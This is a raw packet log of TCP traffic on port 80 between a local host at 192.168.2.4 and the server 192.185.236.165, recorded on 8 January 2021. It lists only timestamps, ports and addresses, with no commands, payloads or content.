Jan 8, 2021 09:34:53.802042961 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803514957 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803539991 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803558111 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803575039 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803591013 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803597927 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803606033 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803622007 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803637981 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803648949 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803653955 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803673029 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803685904 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803697109 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803706884 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803709984 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803723097 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803735018 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803751945 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803769112 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803776026 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803785086 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803806067 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803806067 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803823948 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803831100 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803839922 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803850889 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803855896 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803872108 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803884029 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803888083 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803905010 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803920984 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803934097 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803934097 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803950071 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803966045 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803980112 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.803982019 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.803997993 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.804024935 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.804025888 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.804039001 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.804055929 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.804068089 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.804085970 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.804101944 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.804102898 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.804116964 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.804147959 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.897325039 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.984791040 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.984850883 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.984883070 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.984908104 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.984930038 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.985012054 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.986913919 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.986943960 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.986980915 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987004995 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987027884 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987029076 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987050056 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987070084 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987086058 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987090111 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987111092 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987114906 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987131119 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987139940 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987152100 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987168074 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987185955 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987200975 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987217903 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987240076 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987241030 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987266064 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987278938 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987287998 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987309933 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987324953 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987329960 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987350941 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987371922 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987380028 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987392902 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987409115 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987416983 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987451077 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987462997 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987477064 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987498045 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987519026 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.987521887 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.987580061 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.002392054 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080081940 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080105066 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080121040 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080133915 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080149889 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080168962 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080183029 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080184937 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080202103 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080218077 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080235004 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080221891 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080239058 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080255032 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080274105 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080281019 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080286026 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080290079 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080307007 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080323935 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080338955 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.080338955 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080365896 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080389977 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.080979109 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.095343113 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.173549891 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.173589945 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.173616886 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.173640966 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.173706055 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.173717022 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.173728943 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.173737049 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.174010992 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185292006 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185349941 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185411930 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185434103 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185461044 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185468912 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185491085 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185507059 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185530901 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185554028 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185585976 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185599089 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185628891 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185636044 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185659885 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185674906 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185688972 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185703993 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185720921 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185743093 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185755014 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185777903 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185805082 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185813904 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185837984 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185858011 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185868025 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185889959 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185913086 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.185924053 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185944080 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185969114 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.185992002 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.186012983 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.186026096 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.186078072 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.200359106 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.263618946 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.263655901 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.263679028 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.263706923 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.263742924 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.263768911 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.278148890 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278182030 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278247118 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278270960 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278299093 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.278315067 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278342962 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278353930 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.278378010 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278403044 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278414965 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.278438091 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278465986 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278472900 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.278498888 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278516054 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.278534889 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.278645039 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.296638966 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.356462955 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.356503963 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.356528044 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.356559038 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.356581926 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.356599092 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.356610060 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.356635094 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.356734991 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.368817091 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.368851900 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.368866920 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.368890047 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.368911982 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.368922949 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.368941069 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.368959904 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.368983030 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369004965 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369026899 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.369055986 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369062901 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.369087934 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369115114 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369137049 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.369148016 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369172096 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369198084 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369204998 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.369226933 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369251013 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369261980 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.369283915 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369297981 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.369319916 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369343042 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.369364977 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.383739948 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.383773088 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.383805990 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.383830070 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.383856058 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.383876085 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.383894920 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.383910894 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.383930922 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.384047031 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.388490915 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.446624994 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446705103 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446728945 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446754932 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446773052 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.446794033 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446804047 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.446824074 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446845055 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446865082 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.446875095 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446896076 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446917057 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446935892 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.446947098 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.446969032 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.446978092 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447000027 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447021008 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447041035 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447051048 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447072983 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447084904 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447108030 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447114944 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447137117 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447160006 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447180986 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447194099 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447217941 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447238922 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447262049 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447268009 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447289944 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447295904 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447314978 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447334051 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447360992 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447367907 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447382927 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447400093 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447423935 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447444916 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.447464943 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.447491884 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.455899000 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.461297035 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461354971 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461378098 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461441040 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461457014 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461466074 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.461489916 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461510897 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461532116 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461544037 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.461564064 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461582899 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461599112 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461616039 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.461667061 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.461689949 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.479374886 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.479408026 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.479468107 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.510487080 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.539343119 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.539380074 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.539403915 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.539427042 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.539442062 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.539479971 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.548041105 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.552061081 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552105904 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552120924 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.552146912 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552164078 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552179098 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552196026 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552206039 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.552225113 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552243948 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.552253008 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552265882 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.552280903 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552299976 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552315950 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552325010 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.552340031 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552355051 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552365065 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.552377939 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552391052 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.552400112 CET	80	49728	192.185.236.165	192.168.2.4
